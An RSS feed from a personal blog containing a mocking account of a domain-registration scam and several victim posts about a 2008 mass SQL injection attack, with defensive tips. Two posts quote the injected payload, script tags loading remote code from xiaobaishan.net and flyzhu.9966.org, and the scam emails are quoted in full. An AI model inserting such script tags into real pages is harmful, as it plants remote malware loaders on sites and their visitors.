<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>rumblepup - entrepreneurial spirit &#187; The Internet</title>
	<atom:link href="http://www.rumblepup.com/category/internet/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rumblepup.com</link>
	<description>I&#039;m not a player, I just crush alot</description>
	<lastBuildDate>Sun, 11 Apr 2010 16:19:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Chinese Domain Name Fraud</title>
		<link>http://www.rumblepup.com/chinese-domain-name-fraud/</link>
		<comments>http://www.rumblepup.com/chinese-domain-name-fraud/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 10:49:26 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bestweb-service]]></category>
		<category><![CDATA[bestweb-service.org]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[chinese domain name fraud]]></category>
		<category><![CDATA[chinese domain name scam]]></category>
		<category><![CDATA[discussion]]></category>
		<category><![CDATA[domain names]]></category>
		<category><![CDATA[domain scam]]></category>
		<category><![CDATA[domains]]></category>
		<category><![CDATA[international scam letter]]></category>
		<category><![CDATA[scam]]></category>
		<category><![CDATA[scamming]]></category>
		<category><![CDATA[siegfried and roy]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=123</guid>
		<description><![CDATA[Oh deary me.  Seems I&#8217;m the latest one to get hit with the china domain name scam.  Haven&#8217;t heard of it?  Oh, this is a cool one.  You don&#8217;t have to take my word for it, it&#8217;s been going on all over the place.
You see, this nice domain name registrar company in  China has [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fchinese-domain-name-fraud%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fchinese-domain-name-fraud%2F" height="61" width="51" /></a></div><p style="text-align: justify;">Oh deary me.  Seems I&#8217;m the latest one to get hit with the china domain name scam.  Haven&#8217;t heard of it?  Oh, this is a cool one.  You don&#8217;t have to take my word for it, <a href="http://www.markturner.net/2008/10/20/asiadnr-and-the-domain-name-scam/" target="_blank">it&#8217;s</a> <a href="http://isitascam.wordpress.com/2008/11/13/the-confirmation-regarding-trademark/" target="_blank">been</a> <a href="http://notawomanoffewwords.blogspot.com/2008/10/have-you-seen-anything-like-this.html" target="_blank">going</a> <a href="http://www.emailwasher.com/de/comment/reply/421/9243" target="_blank">on</a> <a href="http://trusted.md/feed/items/system/2008/01/29/asia_domain_name_registration_scam?page=1" target="_blank">all</a> <a href="http://www.miproconsulting.com/blog/2008/06/dns-spam/" target="_blank">over</a> <a href="http://blog.sinohosting.net/beware-of-chinese-domain-names-fraud/" target="_blank">the</a> <a href="http://elliottback.com/wp/domain-name-registration-scam/" target="_blank">place</a>.</p>
<p style="text-align: justify;">You see, this nice <strong><span style="color: #888888;">domain name registrar</span></strong> company in <a href="http://en.wikipedia.org/wiki/China"><strong> China</strong></a> has noticed that one of their customers is trying to register YOUR domain!  And, to make things even worse, they are trying to register your <strong>Intellectual Property Rights</strong> as well!  Well, this gosh by golly good ol <strong>Chinese Domain Name Registrar</strong> has decided to do the right thing and contact you so you can avoid this whole mess!  They will allow you to head off this nefarious <a rel="lightbox" href="http://i.somethingawful.com/cliff/ihateyou/page7-03-new.jpg" target="_blank">domainer </a>at the pass and register the domains with them on your behalf.</p>
<p style="text-align: justify;">What a cool company huh?  They&#8217;ll be happy to send you a list of all the domain names this <a rel="lightbox" href="http://content7.flixster.com/question/54/85/48/5485485_ori.gif" target="_blank">international terrorist mastermind</a> has given them to register, along with their special &#8220;you almost got robbed but we are here to save you&#8221; rates so they can  register it for you!</p>
<p style="text-align: justify;">Wow, <a href="http://www.google.com/search?q=%22bestweb-service.net%22+%2B+scam&amp;sourceid=navclient-ff&amp;ie=UTF-8&amp;rlz=1B3GGGL_enUS231US231" target="_blank">bestweb-service.net</a> is great ain&#8217;t they.</p>
<p style="text-align: justify;">It works like this.  They start going through the Internets, and find your domain.  How?  How&#8217;d you find this site?  They just did, trust me on this one.  Then they check of possible combination&#8217;s of your domain name, but ending in different tld&#8217;s, that are available, then hit you with a scary letter that sounds like this</p>
<blockquote>
<p style="text-align: justify;"><em>Dear CEO&amp;Principal,</em></p>
<p><em>We are a professional Internet consultant organization in Asia, which mainly deal with the global companies&#8217; domain name registration and internet intellectual property right protection. Currently, we have a pretty important issue needing to confirm with your company.</em></p>
<p><em>On Nov 26, 2008, we received an application formally, one company named &#8220;<a rel="lightbox" href="http://www.meanmyspacegraphics.com/graphics/happy_birthday_asshole.jpg" target="_blank">SUSNES Holdings Ltd.</a>&#8221; wanted to applied for the Internet brand &#8220;badassdomain.com&#8221; and some domain names through our body.</em></p>
<p><em>During our preliminary investigation, we found that these domain names&#8217; keyword and internet brand is identical with your trademark. I wonder whether you consigned SUSNES Holdings Ltd to register these domain names through us or not? Or is SUSNES Holdings Ltd your business partner or distributor in Asia? Currently, we have postponed this application of this company temporarily already. In order to deal with this issue better, please let the principal make a confirmation with me by telephone or email ASAP.</em></p>
<p><em>Best Regards,</em></p>
<p><em>Lydia</em></p>
<p><em>Auditing Department (HK)</em></p>
<p><em>Tel:     00852-95660496<br />
00852-95660489<br />
Fax:     00852-82261011<br />
Mail:      <a rel="lightbox" href="http://i480.photobucket.com/albums/rr165/miLa-album/Moustache_Fat_Troll_Woman.jpg?t=1235808582" target="_blank">lydia@bestweb-service.org</a><br />
Web:     <a rel="lightbox" href="http://forum.mg.co.za/files/1801868696-Asshole_20Watcher%5B1%5D.jpg" target="_blank">http://www.bestweb-service.net</a></em></p></blockquote>
<p style="text-align: justify;">Wow, how nice, so I took the bait to see what would happen, and I sent them this.</p>
<blockquote>
<p style="text-align: justify;"><em>Lydia,</em></p>
<p><em>I have owned &#8220;badassdomain.com&#8221;, net and org since 2005-10-16, and have registered the brand as a Trade name.  So What exactly are you blathering about?</em></p>
<p><em>I have no idea who is SUSNES Holdings Ltd, they are not my business partners in any way, shape or form.  Wait, are those the guys I see hanging out at the local gin joint with a couple of hookers, a crack pipe, and a donkey with questionable underwear?  I mean, I don&#8217;t frequent these kind of establishments, but those fuckers owe me money.</em></p>
<p><em>Please feel free to contact me should you have any further questions.</em></p>
<p><em>Thank you.</em></p>
<p><em><a rel="lightbox" href="http://i.somethingawful.com/cliff/ihateyou/page-265/image-05.jpg" target="_blank">Mr. Rumblepup</a><br />
<strong>CEO</strong></em>&amp;<em><strong>Principle</strong></em>&amp;<em><strong>SuperHeavyweightChampionOfTheWorld</strong><br />
&#8220;badassdomain.com&#8221;</em></p></blockquote>
<p style="text-align: justify;">To which Lydia quickly and kindly responds:</p>
<blockquote>
<p style="text-align: justify;"><em>Dear Mr. Rumblepup,</em></p>
<p><em>Have a nice Thanksgiving Day!  Thank you for your reply. If you have no relationship with them. According to our working experience, there are 2 possibilities:1.SUSNES company is a domain name investment company, they want to register these names before you and sell back to you to gain profits;2.It may be a commercial method, SUSNES company is consigned by your competitor to register, they are trying to replicate your idea and let your customers feel confusion.</em></p>
<p><em>We knew your company has registered the domain name &#8220;badassdomain.com&#8221; and own the intellectual property, this is why we informed you. But now SUSNES company do not want to register your trademark or domain name &#8220;badassdomain.com&#8221;, they wanted to apply for other domain names and internet brand you have not registered yet.</em></p>
<p><em>Following are all the domain names and internet brand which are submitted by SUSNES company:<br />
1. Domain name<br />
badassdomain.cn<br />
badassdomain.com.cn<br />
badassdomain.net.cn<br />
badassdomain.org.cn<br />
badassdomain.asia<br />
badassdomain.hk<br />
badassdomain.tw<br />
badassdomain.biz<br />
2. Internet brand<br />
badassdomain</em></p>
<p><em>Because domain name takes open registration, this is international domain name registration principle. So SUSNES company has right to register it. As a domain name registrar, we have no right to stop their application. I think you must know some cases about the domain names grabbed by the third party,we also won&#8217;t want to see similar things happen.</em></p>
<p><em>As the company whose trademarks relate to the applied domain names, you will get the priority to register these domain names and internet brand. If you think these domian names are important to your company,we can send you a dispute application form and help you to register these domains within dispute period, this is a way to prevent domain name from grabbing. Of course, each company has their own idea. If you don&#8217;t think their registration will confuse your clients and harm your profits, you can give up. In order to proceed next step work better, please give me your decision as soon as possible.</em></p>
<p><em>Best regards,</em></p>
<p><em><a rel="lightbox" href="http://i.somethingawful.com/cliff/ihateyou/page-263/image-04.jpg" target="_blank">Lydia</a></em></p></blockquote>
<p style="text-align: justify;">..</p>
<p style="text-align: justify;">Now, you have to understand that at this point, it&#8217;s 4AM in the morning and I&#8217;m feeling a wee bit wicked.  I mean, this is just entertainment at this point, so I respond on more time.</p>
<blockquote>
<p style="text-align: justify;"><em>Lydia, </em></p>
<p style="text-align: justify;"><em>I&#8217;m sorry, but I can&#8217;t understand a fuckin&#8217; thing you have written.  Not only does this read like the wacky information you find on those Chinese Herbal Tea Diet Pills, like &#8220;the state of obesity is the fact of being too fat&#8221; (Ha, that one always gets me) but it&#8217;s also so incredibly eyeball socket grating as well.<br />
</em></p>
<p style="text-align: justify;"><em>I mean, what does </em><em>&#8216;<strong>Thank you for your reply. If you have no relationship with them.</strong>&#8216; supposed to mean?   Are you thanking me for my reply as long as I don&#8217;t have a relationship with them, because if I do, then to hell with me?<br />
</em></p>
<p style="text-align: justify;"><em> &#8216;</em><em><strong>According to our working experience&#8217;</strong>.  Wow, your working experience actually SPEAKS to you?  Mine hasn&#8217;t spoken to me since I went to work for <a href="http://www.siegfriedandroy.com/home/index.php" target="_blank">Siegfried &amp; Roy </a>all those years ago, but that&#8217;s another story. </em></p>
<p style="text-align: justify;"><em>&#8216;</em><em>t<strong>hey are trying to replicate your idea and let your customers feel confusion.</strong>&#8216;   Oh yeah?  Well what if my customers are <strong>not allowed </strong>to feel confusion huh?  I mean, I know the Chinese State pretty much controls everything over there, but over here in the US, the only people who control anything are the ones with the big tanks.<br />
</em></p>
<p style="text-align: justify;"><em>&#8216;</em><em><strong>they wanted to apply for other domain names and internet brand you have not registered yet&#8217; </strong> OHHH, is that all?  Go ahead and let them have those domains.  I&#8217;m good with that, cause none of my customers are in China, and you know, I own the .com and everybody knows that there are those <a rel="lightbox" href="http://i.somethingawful.com/cliff/ihateyou/page-258/image-1.jpg" target="_blank">Chinese Malware Sites</a> and all. </em></p>
<p style="text-align: justify;"><em>&#8216;</em><em><strong>As the company whose trademarks relate to the applied domain names, you will get the priority to register these domain names and internet brand.&#8217;</strong> Now your just trying to make my head spin.<br />
</em></p>
<p style="text-align: justify;"><em>&#8216;</em><em>I<strong>f you don&#8217;t think their registration will confuse your clients and <a rel="lightbox" href="http://pics.livejournal.com/billylickalolly/pic/00059tb3" target="_blank">harm your profits, you can give up.</a>&#8216; </strong>NEVER, NEVER will I give up.  Don&#8217;t you understand, that this is <a rel="lightbox" href="http://i.somethingawful.com/cliff/ihateyou/page-259/4.jpg" target="_blank">my calling in life</a>?</em></p>
<p style="text-align: justify;"><em><strong>&#8216;</strong></em><em><strong>In order to proceed next step work better, please give me your decision as soon as possible.&#8217; </strong> I mean really, What the Holy Hopin Horseshit is that?  Does that mean you want my next step better work, or are you warning me about a hole in the floor, and to be carefull where I work?  Or is that step?  What, do you think people in America can&#8217;t walk or something? </em></p>
<p style="text-align: justify;"><em>Ok, since you said please&#8230;here&#8217;s my decision.<br />
</em></p>
<p style="text-align: justify;"><em>Go away and take a course in <span style="color: #888888;">&#8216;Using your brain to think &#8211; The Curly Method</span>&#8216; and see if we can get some better communication going.</em></p>
<p style="text-align: justify;"><em>Yours Truly</em></p>
<p style="text-align: justify;"><a href="http://www.rumblepup.com/"><em>Mr. Rumblepup</em></a></p>
<p style="text-align: justify;"><em><strong>CEO</strong>&amp;<strong>Principle</strong>&amp;<strong>SuperDeluxeHamburger</strong></em></p>
<p style="text-align: justify;"><em>badassdomian.com</em></p>
</blockquote>
<p style="text-align: justify;">I haven&#8217;t exactly gotten a call back yet.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/chinese-domain-name-fraud/feed/</wfw:commentRss>
		<slash:comments>46</slash:comments>
		</item>
		<item>
		<title>F-OFF mr sql injection hacker</title>
		<link>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/</link>
		<comments>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/#comments</comments>
		<pubDate>Mon, 09 Jun 2008 15:09:56 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=34</guid>
		<description><![CDATA[Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.
]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Ff-off-mr-sql-injection-hacker%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Ff-off-mr-sql-injection-hacker%2F" height="61" width="51" /></a></div><p>Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.</p>
<p>Bye bye sql injection hacker.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SQL injection attack.  Found the code being used.</title>
		<link>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/</link>
		<comments>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 21:10:46 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[website hack]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=33</guid>
		<description><![CDATA[Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F" height="61" width="51" /></a></div><p>Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.</p>
<blockquote>
<h5><em>Code was messing up my layout.  check out the text file <a href="http://www.rumblepup.com/sqlattack.txt">here</a>.<br />
</em></h5>
</blockquote>
<p>So look through your server logs for this code in the url with a GET statement.  Have your coder or web programmer disallow all all of the elements being used in the statement.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Latest info on SQL injection attack.</title>
		<link>http://www.rumblepup.com/latest-info-on-sql-injection-attack/</link>
		<comments>http://www.rumblepup.com/latest-info-on-sql-injection-attack/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 01:46:05 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[hack attempts]]></category>
		<category><![CDATA[spamming]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=32</guid>
		<description><![CDATA[I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Flatest-info-on-sql-injection-attack%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Flatest-info-on-sql-injection-attack%2F" height="61" width="51" /></a></div><p>I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only &#8220;attempts&#8221; to find a vulnerability.</p>
<p>So I did some more research, and had a talk with <a href="http://jesscoburn.com/">Jess Coburn</a> with <a href="http://www.appliedi.net/">Windows Hosting</a> company Appliedi.net.  Although the attack seems like a Window vulnerability, because of the attempts to gain entry through typical Windows Vulnerabilities, it&#8217;s not.  The media file attempts where only PART of the attempts made.  Apparently this attack is either preempted or followed up by various attempts to gain entry.  On our site, it was not a sql injection in the url, but a search form where we had created that uses what&#8217;s called an &#8220;Enter Event.&#8221;  Quickly, most asp.net search forms eschew keyboard events in favor of click events that call javascript postbacks.  Meaning that if you have an asp.net search control on your website, a person has to click the search button instead of just hitting Enter.</p>
<p>Here lies the problem.  User&#8217;s hate hitting search buttons, but love hitting their enter key.  Enter events are easy to create programmatically, thus so many forums and blogs get spammed and hacked all of the time.  However, javascript postback&#8217;s, not so much.   So far, from the little I do know, it&#8217;s very difficult to program into a hack scan a postback because it does not do a post or get the way most sites do.</p>
<p>But back to the problem and some solutions.</p>
<ol>
<li>Disallow all sql parameters in your form text fields.  There are plenty of tutorials on how to do this.</li>
<li>Read Jess&#8217;s blog, he has a TON of links to great source and a neat rollback sql function to fix these type of sql injections</li>
<li>Remove &#8220;Enter Events&#8221; from your asp and asp.net forms.  Your users are going to have to click on the button for now.</li>
<li>Did I mention go to Jess&#8217;s blog?</li>
<li>Check for your most recent database backup.  If the offending script does not appear, you&#8217;ll have clean code and timestamp as to when the last time your code was clean.</li>
<li>If you don&#8217;t do regular backups, start to get into the habit right NOW.  If you have to do a backup every 2 hours, then do it.  Keep copies online and off.  A reputable hosting company will allow you to make as many backups as you need.</li>
<li>Check your hosting company&#8217;s backup policy.  Appliedi.net backups data at least twice in a 24 hour period.</li>
<li>If you&#8217;re on a dedicated box, assign some space and memory to run sql backup jobs automatically.  I&#8217;m doing some research on best practices.</li>
<li>During the hack attempt, or event, have a BIG GLASS OF SCOTCH, RUM, OR LIQUOR OF YOUR OWN CHOOSING.  These things are not easy to get through, but you need to relax or you&#8217;ll never get through it.</li>
<li>Be better prepared.  Just like a hurricane or earthquake, have a <strong>disaster plan</strong>.</li>
</ol>
<p>Hope this helps.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/latest-info-on-sql-injection-attack/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>The xiaobaishan bomb is now the flyzhu.9966 bomb.</title>
		<link>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/</link>
		<comments>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/#comments</comments>
		<pubDate>Wed, 04 Jun 2008 15:05:11 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=31</guid>
		<description><![CDATA[Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:
&#60;script src=http://flyzhu.9966.org/us/Help.asp&#62;&#60;/script&#62;
Tricky little fucker.
In fact, this hack is pretty well thought out.  Like I said on a previous [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F" height="61" width="51" /></a></div><p>Updated from: <a href="http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/">The xiaobaishan bomb.</a></p>
<p>Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:</p>
<blockquote><p>&lt;script src=http://<strong>flyzhu.9966.org</strong>/us/Help.asp&gt;&lt;/script&gt;</p></blockquote>
<p>Tricky little fucker.</p>
<p>In fact, this hack is pretty well thought out.  Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds.  What happened?</p>
<p>This is a Windows vulnerability.  What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder.  They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.</p>
<p><strong><span style="color: #993300;">UPDATE:</span> I&#8217;ve got <a href="http://www.rumblepup.com/latest-info-on-sql-injection-attack/">new info</a> on this. </strong> It&#8217;s a pure sql injection hack.</p>
<p>Sneaky fucker.</p>
<p><span style="text-decoration: line-through;">Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn&#8217;t run it against our VPS yet. </span></p>
<p><span style="color: #993300;"><strong>UPDATE:  Yes they did.  Whoopsee.</strong></span></p>
<p>So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.</p>
<p>Right now, there is a reported 10,000 sites affected by this hack.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>The xiaobaishan bomb.  Thousands of sites hacked.</title>
		<link>http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/</link>
		<comments>http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/#comments</comments>
		<pubDate>Mon, 02 Jun 2008 03:40:35 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[hack bomb]]></category>
		<category><![CDATA[sites hacked]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[xiaobaishan]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=30</guid>
		<description><![CDATA[It&#8217;s very rare that I get the inside scoop on a bomb hack, but this this time I&#8217;m one of the victims.   Seems that some kind of sql injection hack has been leveled against thousands of websites.  I&#8217;m calling it, for lack of a better term, the xiaobaishan bomb.
As I&#8217;m checking for [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-thousands-of-sites-hacked%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-thousands-of-sites-hacked%2F" height="61" width="51" /></a></div><p style="text-align: justify;">It&#8217;s very rare that I get the inside scoop on a bomb hack, but this this time I&#8217;m one of the victims.   Seems that some kind of sql injection hack has been leveled against thousands of websites.  I&#8217;m calling it, for lack of a better term, the <strong>xiaobaishan bomb</strong>.</p>
<p style="text-align: justify;">As I&#8217;m checking for the night the site that I SEO, banler.com, I notice that it&#8217;s running slow a molasses.  Can&#8217;t be cause it&#8217;s on a pretty powerful VPS server.  But I notice that it&#8217;s waiting on some unknown script.  I do a quick source check and I see that every single one of my navigational items has this freaky call in it,</p>
<blockquote style="text-align: justify;"><p>&lt;script src=http://www.xiaobaishan.net/dt/us/Help.asp&gt;&lt;/script&gt;</p></blockquote>
<p style="text-align: justify;">My security mind goes into full effect and I jump into the server to check around.  The codebase is compeletely clean.  Nothing like that in there.  Since my app is in asp.net, I know that code hacking is pretty difficult, as asp.net dll&#8217;s are obfusticated (messed up so only asp.net can understand it)  so I know that&#8217;s not it.</p>
<p style="text-align: justify;">Since it was my navigation that was hit, and my navigation is run from a SQL 2000 database, I jump into the database, start opening up tables and, as we say in my Cuban neighborhood, FUACATA!  There you go, a shitload of this strange script call all through the database.  I contact the database admin to see if they have a backup, and as of this writing, their working on it.</p>
<p style="text-align: justify;">But it made me wonder who the heck was doing this.  So I did a little search on Google,  and I find <a href="http://www.google.com/search?sourceid=navclient&amp;ie=UTF-8&amp;rlz=1T4GGIH_enUS231US231&amp;q=xiaobaishan" target="_blank">this result</a>.</p>
<p style="text-align: justify;"><strong><span style="color: #993300;">UPDATE: 4080 sites hacked.</span></strong></p>
<p style="text-align: justify;">That&#8217;s right, about <span style="text-decoration: line-through;">two thousand eight hundred websites</span> four thousand and eighty affected as of right now.  Who knows what it will be in the morning.</p>
<p style="text-align: justify;"><span style="color: #993300;"><strong>UPDATE 6/2/08:  Checked with Yahoo and Live.  Seems that number might be up to about 20,000. </strong><span style="color: #000000;">Xiaobaishan is aparently the name of a Volcano.</span></span></p>
<p style="text-align: justify;">When I try to check out the site, nothing exists, so I&#8217;m thinking that this was some type of malware keyboard recorder, or some other fucked up hack.  There are some pretty impressive sites in this result set, and some of these where hacked a few days ago, so I&#8217;m hoping that their webmasters and site administrators are catching this.</p>
<p style="text-align: justify;">So far, all of the sites that have been hacked are asp or asp.net based sites.  Now I know what your going to say, Windows tech and all of that, but asp.net has been famous for avoiding hack.  This seems like a SQL 2000 hack.  Someone must have been sniffing for the database connections and got them, then somehow gained control of the individual databases, and went to town insterting this code into everything they could find.  Since a lot of database driven websites have their navigation dynamically generated from the database, blamo.</p>
<p style="text-align: justify;">I&#8217;m not a security expert and certainly not a IP pack expert or any kind of tech expert, I can&#8217;t really comment on what happened and how to fix it.  All I can say is I hate freakin hackers.  I mean, this world is full of nefarious people of all shapes and sizes and cultures, but sometime I feel that we in the Search Industry ought to have some kind of defense, other than technical, that we can all work together on.</p>
<p style="text-align: justify;">In any case,  mister hacker,  I can bestow a curse upon you the likes that the internet has ever seen before, where even the maker of &#8220;two girls one cup&#8221; would cringe at the ramifications of my hate filled bombastic flurry of verbal fire.  But you know what?  I&#8217;ve changed in the last few years, and I can only say this.  Bless you man.  I hope that whatever thrill this gave you or whatever benefits you think your going to get will make you happy for a short while.  I&#8217;ve noticed that the universe dishes out much heavier Karma that what we throw at it, and the bad waves you&#8217;ve made today will someday return and affect your life personally.  I hope for your sake its just a computer malfunction, or a credit card snafu.  But in all honesty, the way I see it, when God wants you punished, it&#8217;s not a one day thing.  You can&#8217;t just say &#8220;Ok, I&#8217;m sorry, I won&#8217;t do it again&#8221; and hope that everything will be ok.  I know this because I&#8217;ve earned myself some karma justice in the past, and it comes hard and angry and lasts for years and years.  Watch your health and your families health.  Think about what you&#8217;ve done and I hope you learn something from it.  I hope you learn that you are killing businesses, and people&#8217;s livelyhoods.  I hope you learn that gains are little when compared to personal loss.</p>
<p style="text-align: justify;">I hope you learn now before it&#8217;s too late.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>
